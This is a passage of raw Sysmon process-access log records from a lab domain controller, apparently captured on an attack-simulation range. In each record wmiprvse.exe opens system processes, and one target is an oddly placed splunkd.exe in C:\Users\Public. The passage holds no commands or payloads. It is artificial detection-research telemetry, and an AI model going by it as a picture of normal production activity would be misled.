Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 